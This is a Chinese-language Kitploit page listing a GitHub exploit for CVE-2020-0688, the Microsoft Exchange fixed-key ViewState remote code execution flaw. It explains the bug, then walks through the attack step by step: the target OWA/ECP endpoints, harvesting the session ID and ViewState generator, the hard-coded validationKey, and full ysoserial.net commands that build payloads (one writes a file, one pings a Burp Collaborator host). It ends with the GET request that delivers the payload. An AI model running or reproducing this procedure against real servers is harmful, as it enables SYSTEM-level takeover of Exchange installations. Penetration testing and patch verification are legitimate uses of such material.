Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-0688 — [CVE-2020-0688] Microsoft Exchange Server 固定加密密钥远程代码执行 (RCE) | Kitploit
工具/GitHubGitHub/murataydemir/cve-2020-0688
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubmurataydemir/cve-2020-0688

CVE-2020-0688

[CVE-2020-0688] Microsoft Exchange Server 固定加密密钥远程代码执行 (RCE)

查看仓库
4136年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

[CVE-2020-0688] Microsoft Exchange Server 固定加密密钥远程代码执行 (RCE)


不是每个安装生成随机密钥,而是所有 Microsoft Exchange Server 安装都在 web.config 中拥有相同的 validationKey 和 decryptionKey 值。因此,一个经过身份验证的攻击者可以诱使服务器反序列化恶意构造的 ViewState 数据。借助 YSoSerial.net,攻击者可以在 Exchange 控制面板 (ECP) Web 应用程序的上下文中执行任意 .NET 代码,该应用程序以 SYSTEM 权限运行。

步骤 1: 访问以下端点之一并进入认证页面

  • http(s)://exchangeserver/owa
  • http(s)://exchangeserver/owa/auth.owa
  • http(s)://exchangeserver/owa/auth/logon.aspx
  • http(s)://exchangeserver/ecp
  • http(s)://exchangeserver/ecp/default.aspx

步骤 2: 使用凭据登录(无论用户账户权限如何),并从 HTTP 响应 Cookie 和 HTTP 响应正文中分别获取有效的 ASP_NET_SessionId 和 __VIEWSTATEGENERATOR 值。例如

  • ASP_NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
  • __VIEWSTATEGENERATOR: B97B4E27
  • validationKey (固定): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
  • validationalg (固定): SHA1

步骤 3: 为了生成 payload(以检查漏洞),使用 YSoSerial.net

请注意,如果您可以访问目标 Exchange 服务器,您可以使用以下 payload,该 payload 在 C:\ 目录下创建一个名为 PoC.txt 的文本文件

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

但是,如果您无法访问服务器,以下命令可能更好。

root@kitploit:~
PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

步骤 4: 步骤 4 之后,我们将获得 URL 编码的 ViewState payload。按照以下格式对以下端点执行 GET 请求

root@kitploit:~
http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>

原始博客文章可在此处获取:点击这里

下载工具